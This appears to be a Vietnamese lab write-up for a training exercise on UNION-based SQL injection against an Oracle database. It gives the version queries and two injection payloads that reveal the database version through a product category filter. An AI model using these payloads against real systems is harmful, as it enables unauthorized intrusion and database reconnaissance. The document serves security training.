search

Lab: SQL injection attack, querying the database type and version on Oracle

hashtag
Mô tả

Phòng thí nghiệm này chứa lỗ hổng SQL injectionarrow-up-right trong bộ lọc danh mục sản phẩm. Bạn có thể sử dụng tấn công UNION để lấy kết quả từ truy vấn được tiêm.

Mục tiêu: Hiển thị chuỗi phiên bản cơ sở dữ liệu

hashtag
Phân tích

Oracle

SELECT banner FROM v$version SELECT version FROM v$instance

hashtag
Giải pháp

' UNION SELECT NULL,NULL FROM v$version--

' UNION SELECT banner FROM v$version--

PreviousExamining the databaseNextLab: SQL injection attack, querying the database type and version on MySQL and Microsoft

Last updated